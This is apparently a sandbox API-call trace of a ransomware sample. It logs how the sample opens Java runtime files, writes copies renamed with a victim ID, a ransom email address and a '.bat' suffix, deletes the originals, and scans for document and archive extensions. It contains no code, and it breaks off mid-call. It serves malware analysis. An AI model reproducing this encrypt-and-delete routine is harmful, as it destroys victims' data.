0xffffffff [0201.938] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.938] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.938] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.938] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0201.939] GetLastError () returned 0x0 [0201.939] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x278, lpOverlapped=0x0) returned 1 [0201.940] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x280, lpOverlapped=0x0) returned 1 [0201.941] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.941] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe2, lpOverlapped=0x0) returned 1 [0201.941] SetEndOfFile (hFile=0x330) returned 1 [0201.941] CloseHandle (hObject=0x330) returned 1 [0201.941] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.941] SetEndOfFile (hFile=0x390) returned 1 [0201.942] CloseHandle (hObject=0x390) returned 1 [0201.942] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0201.942] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\gray.pf")) returned 1 [0201.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.943] lstrlenW (lpString=".doc") returned 4 [0201.943] lstrcmpiW (lpString1=".doc", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".docx") returned 5 [0201.943] lstrcmpiW (lpString1=".docx", lpString2="AY.pf") returned -1 [0201.943] lstrlenW (lpString=".pdf") returned 4 [0201.943] lstrcmpiW (lpString1=".pdf", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".xls") returned 4 [0201.943] lstrcmpiW (lpString1=".xls", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".xlsx") returned 5 [0201.943] lstrcmpiW (lpString1=".xlsx", lpString2="AY.pf") returned -1 [0201.943] lstrlenW (lpString=".ppt") returned 4 [0201.943] lstrcmpiW (lpString1=".ppt", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.943] lstrlenW (lpString=".zip") returned 4 [0201.943] lstrcmpiW (lpString1=".zip", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".rar") returned 4 [0201.943] lstrcmpiW (lpString1=".rar", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".bz2") returned 4 [0201.943] lstrcmpiW (lpString1=".bz2", lpString2="Y.pf") returned -1 [0201.943] lstrlenW (lpString=".7z") returned 3 [0201.943] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.943] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.943] lstrlenW (lpString=".dbf") returned 4 [0201.944] lstrcmpiW (lpString1=".dbf", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.944] lstrlenW (lpString=".1cd") returned 4 [0201.944] lstrcmpiW (lpString1=".1cd", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.944] lstrlenW (lpString=".jpg") returned 4 [0201.944] lstrcmpiW (lpString1=".jpg", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.944] lstrlenW (lpString=".doc") returned 4 [0201.944] lstrcmpiW (lpString1=".doc", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString=".docx") returned 5 [0201.944] lstrcmpiW (lpString1=".docx", lpString2="AY.pf") returned -1 [0201.944] lstrlenW (lpString=".pdf") returned 4 [0201.944] lstrcmpiW (lpString1=".pdf", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString=".xls") returned 4 [0201.944] lstrcmpiW (lpString1=".xls", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString=".xlsx") returned 5 [0201.944] lstrcmpiW (lpString1=".xlsx", lpString2="AY.pf") returned -1 [0201.944] lstrlenW (lpString=".ppt") returned 4 [0201.944] lstrcmpiW (lpString1=".ppt", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.944] lstrlenW (lpString=".zip") returned 4 [0201.944] lstrcmpiW (lpString1=".zip", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString=".rar") returned 4 [0201.944] lstrcmpiW (lpString1=".rar", lpString2="Y.pf") returned -1 [0201.944] lstrlenW (lpString=".bz2") returned 4 [0201.945] lstrcmpiW (lpString1=".bz2", lpString2="Y.pf") returned -1 [0201.945] lstrlenW (lpString=".7z") returned 3 [0201.945] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0201.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.945] lstrlenW (lpString=".dbf") returned 4 [0201.945] lstrcmpiW (lpString1=".dbf", lpString2="Y.pf") returned -1 [0201.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.945] lstrlenW (lpString=".1cd") returned 4 [0201.945] lstrcmpiW (lpString1=".1cd", lpString2="Y.pf") returned -1 [0201.945] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\GRAY.pf") returned 50 [0201.945] lstrlenW (lpString=".jpg") returned 4 [0201.945] lstrcmpiW (lpString1=".jpg", lpString2="Y.pf") returned -1 [0201.945] lstrcmpiW (lpString1=".pf", lpString2=".bat") returned 1 [0201.954] lstrlenW (lpString="PYCC.pf") returned 7 [0201.955] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.955] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=274474) returned 1 [0201.955] CloseHandle (hObject=0x390) returned 1 [0201.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 0x20 [0201.955] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0201.955] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0201.956] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.956] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.956] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0201.958] GetLastError () returned 0x0 [0201.958] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x4302a, lpOverlapped=0x0) returned 1 [0201.996] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x43030, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x43030, lpOverlapped=0x0) returned 1 [0202.007] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.007] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xe2, lpOverlapped=0x0) returned 1 [0202.007] SetEndOfFile (hFile=0x330) returned 1 [0202.007] CloseHandle (hObject=0x330) returned 1 [0202.007] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.007] SetEndOfFile (hFile=0x390) returned 1 [0202.011] CloseHandle (hObject=0x390) returned 1 [0202.011] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.011] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\cmm\\pycc.pf")) returned 1 [0202.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.011] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.011] lstrlenW (lpString=".doc") returned 4 [0202.011] lstrcmpiW (lpString1=".doc", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".docx") returned 5 [0202.012] lstrcmpiW (lpString1=".docx", lpString2="CC.pf") returned -1 [0202.012] lstrlenW (lpString=".pdf") returned 4 [0202.012] lstrcmpiW (lpString1=".pdf", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".xls") returned 4 [0202.012] lstrcmpiW (lpString1=".xls", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".xlsx") returned 5 [0202.012] lstrcmpiW (lpString1=".xlsx", lpString2="CC.pf") returned -1 [0202.012] lstrlenW (lpString=".ppt") returned 4 [0202.012] lstrcmpiW (lpString1=".ppt", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.012] lstrlenW (lpString=".zip") returned 4 [0202.012] lstrcmpiW (lpString1=".zip", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".rar") returned 4 [0202.012] lstrcmpiW (lpString1=".rar", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".bz2") returned 4 [0202.012] lstrcmpiW (lpString1=".bz2", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString=".7z") returned 3 [0202.012] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0202.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.012] lstrlenW (lpString=".dbf") returned 4 [0202.012] lstrcmpiW (lpString1=".dbf", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.012] lstrlenW (lpString=".1cd") returned 4 [0202.012] lstrcmpiW (lpString1=".1cd", lpString2="C.pf") returned -1 [0202.012] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.012] lstrlenW (lpString=".jpg") returned 4 [0202.012] lstrcmpiW (lpString1=".jpg", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.013] lstrlenW (lpString=".doc") returned 4 [0202.013] lstrcmpiW (lpString1=".doc", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".docx") returned 5 [0202.013] lstrcmpiW (lpString1=".docx", lpString2="CC.pf") returned -1 [0202.013] lstrlenW (lpString=".pdf") returned 4 [0202.013] lstrcmpiW (lpString1=".pdf", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".xls") returned 4 [0202.013] lstrcmpiW (lpString1=".xls", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".xlsx") returned 5 [0202.013] lstrcmpiW (lpString1=".xlsx", lpString2="CC.pf") returned -1 [0202.013] lstrlenW (lpString=".ppt") returned 4 [0202.013] lstrcmpiW (lpString1=".ppt", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.013] lstrlenW (lpString=".zip") returned 4 [0202.013] lstrcmpiW (lpString1=".zip", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".rar") returned 4 [0202.013] lstrcmpiW (lpString1=".rar", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".bz2") returned 4 [0202.013] lstrcmpiW (lpString1=".bz2", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString=".7z") returned 3 [0202.013] lstrcmpiW (lpString1=".7z", lpString2=".pf") returned -1 [0202.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.013] lstrlenW (lpString=".dbf") returned 4 [0202.013] lstrcmpiW (lpString1=".dbf", lpString2="C.pf") returned -1 [0202.013] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.013] lstrlenW (lpString=".1cd") returned 4 [0202.014] lstrcmpiW (lpString1=".1cd", lpString2="C.pf") returned -1 [0202.014] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\cmm\\PYCC.pf") returned 50 [0202.014] lstrlenW (lpString=".jpg") returned 4 [0202.014] lstrcmpiW (lpString1=".jpg", lpString2="C.pf") returned -1 [0202.014] lstrcmpiW (lpString1=".data", lpString2=".bat") returned 1 [0202.014] lstrlenW (lpString="currency.data") returned 13 [0202.014] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.015] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=4122) returned 1 [0202.015] CloseHandle (hObject=0x390) returned 1 [0202.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 0x20 [0202.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.015] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.015] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.015] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.015] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0202.016] GetLastError () returned 0x0 [0202.016] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x101a, lpOverlapped=0x0) returned 1 [0202.018] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0x1020, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0x1020, lpOverlapped=0x0) returned 1 [0202.019] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0x0, lpOverlapped=0x0) returned 1 [0202.019] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesWritten=0x375fc94*=0xee, lpOverlapped=0x0) returned 1 [0202.019] SetEndOfFile (hFile=0x330) returned 1 [0202.019] CloseHandle (hObject=0x330) returned 1 [0202.019] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.019] SetEndOfFile (hFile=0x390) returned 1 [0202.020] CloseHandle (hObject=0x390) returned 1 [0202.020] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x20) returned 1 [0202.020] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\currency.data")) returned 1 [0202.021] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.021] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.021] lstrlenW (lpString=".doc") returned 4 [0202.021] lstrcmpiW (lpString1=".doc", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".docx") returned 5 [0202.021] lstrcmpiW (lpString1=".docx", lpString2=".data") returned 1 [0202.021] lstrlenW (lpString=".pdf") returned 4 [0202.021] lstrcmpiW (lpString1=".pdf", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".xls") returned 4 [0202.021] lstrcmpiW (lpString1=".xls", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".xlsx") returned 5 [0202.021] lstrcmpiW (lpString1=".xlsx", lpString2=".data") returned 1 [0202.021] lstrlenW (lpString=".ppt") returned 4 [0202.021] lstrcmpiW (lpString1=".ppt", lpString2="data") returned -1 [0202.021] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.021] lstrlenW (lpString=".zip") returned 4 [0202.021] lstrcmpiW (lpString1=".zip", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".rar") returned 4 [0202.021] lstrcmpiW (lpString1=".rar", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".bz2") returned 4 [0202.021] lstrcmpiW (lpString1=".bz2", lpString2="data") returned -1 [0202.021] lstrlenW (lpString=".7z") returned 3 [0202.021] lstrcmpiW (lpString1=".7z", lpString2="ata") returned -1 [0202.021] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString=".dbf") returned 4 [0202.022] lstrcmpiW (lpString1=".dbf", lpString2="data") returned -1 [0202.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString=".1cd") returned 4 [0202.022] lstrcmpiW (lpString1=".1cd", lpString2="data") returned -1 [0202.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString=".jpg") returned 4 [0202.022] lstrcmpiW (lpString1=".jpg", lpString2="data") returned -1 [0202.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString=".doc") returned 4 [0202.022] lstrcmpiW (lpString1=".doc", lpString2="data") returned -1 [0202.022] lstrlenW (lpString=".docx") returned 5 [0202.022] lstrcmpiW (lpString1=".docx", lpString2=".data") returned 1 [0202.022] lstrlenW (lpString=".pdf") returned 4 [0202.022] lstrcmpiW (lpString1=".pdf", lpString2="data") returned -1 [0202.022] lstrlenW (lpString=".xls") returned 4 [0202.022] lstrcmpiW (lpString1=".xls", lpString2="data") returned -1 [0202.022] lstrlenW (lpString=".xlsx") returned 5 [0202.022] lstrcmpiW (lpString1=".xlsx", lpString2=".data") returned 1 [0202.022] lstrlenW (lpString=".ppt") returned 4 [0202.022] lstrcmpiW (lpString1=".ppt", lpString2="data") returned -1 [0202.022] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.022] lstrlenW (lpString=".zip") returned 4 [0202.022] lstrcmpiW (lpString1=".zip", lpString2="data") returned -1 [0202.022] lstrlenW (lpString=".rar") returned 4 [0202.022] lstrcmpiW (lpString1=".rar", lpString2="data") returned -1 [0202.022] lstrlenW (lpString=".bz2") returned 4 [0202.023] lstrcmpiW (lpString1=".bz2", lpString2="data") returned -1 [0202.023] lstrlenW (lpString=".7z") returned 3 [0202.023] lstrcmpiW (lpString1=".7z", lpString2="ata") returned -1 [0202.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.023] lstrlenW (lpString=".dbf") returned 4 [0202.023] lstrcmpiW (lpString1=".dbf", lpString2="data") returned -1 [0202.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.023] lstrlenW (lpString=".1cd") returned 4 [0202.023] lstrcmpiW (lpString1=".1cd", lpString2="data") returned -1 [0202.023] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\currency.data") returned 52 [0202.023] lstrlenW (lpString=".jpg") returned 4 [0202.023] lstrcmpiW (lpString1=".jpg", lpString2="data") returned -1 [0202.023] lstrcmpiW (lpString1=".properties", lpString2=".bat") returned 1 [0202.023] lstrlenW (lpString="messages.properties") returned 19 [0202.023] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.033] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x375ff14 | out: lpFileSize=0x375ff14*=2860) returned 1 [0202.033] CloseHandle (hObject=0x390) returned 1 [0202.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties")) returned 0x20 [0202.033] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0202.033] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0202.033] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.033] SetFilePointerEx (in: hFile=0x390, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec0 | out: lpNewFilePointer=0x0) returned 1 [0202.033] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\deploy\\messages.properties.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0202.097] GetLastError () returned 0x0 [0202.097] ReadFile (in: hFile=0x390, lpBuffer=0x415e020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fecc, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, lpNumberOfBytesRead=0x375fecc*=0xb2c, lpOverlapped=0x0) returned 1 [0202.125] WriteFile (in: hFile=0x330, lpBuffer=0x415e020*, nNumberOfBytesToWrite=0xb30, lpNumberOfBytesWritten=0x375fc94, lpOverlapped=0x0 | out: lpBuffer=0x415e020*, 